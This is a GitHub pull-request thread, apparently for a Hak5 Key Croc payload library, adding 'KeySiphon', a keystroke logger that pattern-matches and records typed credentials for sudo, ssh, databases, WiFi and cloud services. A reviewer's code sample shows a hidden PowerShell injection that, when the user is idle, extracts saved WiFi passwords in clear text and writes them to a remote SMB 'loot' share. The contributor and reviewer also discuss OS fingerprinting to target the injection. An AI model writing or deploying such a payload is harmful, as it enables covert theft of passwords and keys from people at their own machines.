feat: NullSec-KeySiphon — Intelligent Keystroke Credential Harvester #73
bad-antics wants to merge 3 commits into hak5:master from
Conversation
- 25+ MATCH patterns for credential detection
  - System auth (sudo, su, ssh, runas, passwd)
  - Database logins (mysql, psql, smbclient)
  - WiFi credentials (wpa_passphrase, nmcli, netsh)
  - Cloud/API keys (AWS, Azure, GCloud, tokens)
  - Web login form detection
- Categorized logging (credentials vs general keystrokes)
- Optional idle-triggered active recon
SAVE KEYBOARD $KEYLOG

# Q STRING injection for silent recon when idle
# (Optional — uncomment to run recon when user is away)
I think the better way to do this is to put the content within a function and comment out the function call. This will allow the end user to more easily configure the payload; they only need to uncomment 1 line vs multiple.
For example:
```bash
wifi_dump() {
WAIT_FOR_IDLE 300
LED B
Q DELAY 500
if [[ "$OS" == "WINDOWS" ]]; then
Q GUI r
Q DELAY 500
Q STRING powershell -w hidden -ep bypass -c "
\$o = @()
\$o += '=== WiFi Profiles ==='
netsh wlan show profiles | Select-String 'All User' | ForEach {
\$name = (\$_ -split ': ')[1].Trim()
\$key = (netsh wlan show profile name=\$name key=clear | Select-String 'Key Content').ToString().Split(':')[1].Trim()
\$o += \"\$name : \$key\"
}
\$o | Out-File -FilePath '\\\\172.16.64.1\\croc_loot\\wifi_auto.txt'
"
Q ENTER
fi
LED G
}
# wifi_dump
```
# WAIT_FOR_IDLE 300
# LED B
# Q DELAY 500
# if [[ "$OS" == "WINDOWS" ]]; then
Where are you getting the $OS variable? The Key Croc does not have native OS detection or an OS global variable. I do not see it defined within the payload.
…ction, call commented out
- Add detect_os() function using udev USB enumeration for OS fingerprinting
- Wrap active WiFi recon in wifi_dump() function (multi-OS: Win/Mac/Linux)
- Comment out wifi_dump and detect_os calls — uncomment to enable
- Use STRINGLN instead of STRING+ENTER in injected commands
- Version bump to 1.1

Addresses review feedback from hak5peaks:
- hak5#73 (comment)
- hak5#73 (comment)
Thanks for the detailed review @hak5peaks! Just pushed fixes (commit 3f7fb41) addressing both points:
Re: wifi_dump function structure — The active WiFi recon is now properly wrapped in a
Re:
Let me know if anything else needs adjusting!
1. wifi_dump now calls detect_os() internally so $OS is never undefined — fixes the orphaned variable issue.
2. All active recon wrapped in wifi_dump() as a single function. End user only needs to uncomment one line to enable.
3. Version bumped to 1.2
Hey @hak5peaks, pushed fixes in
Let me know if there's anything else!
@hak5peaks — all the review feedback has been addressed in the branch. To summarize:
Ready for re-review whenever you get a chance! Happy to make any further adjustments.
NullSec-KeySiphon
Intelligent keystroke logging payload for the Key Croc with pattern-matching credential detection.
Features:
- System auth: sudo, su, ssh, runas, passwd
- Database logins: mysql, psql, smbclient
- WiFi credentials: wpa_passphrase, nmcli, netsh wlan
- Cloud/API keys: aws configure, az login, gcloud auth, tokens, API keys
- Web login forms: password, login, username patterns

Output:
Optional Active Recon:
Includes commented-out idle-triggered WiFi credential extraction that activates when the user is away.
Cross-platform — detects patterns from Windows, macOS, and Linux terminals.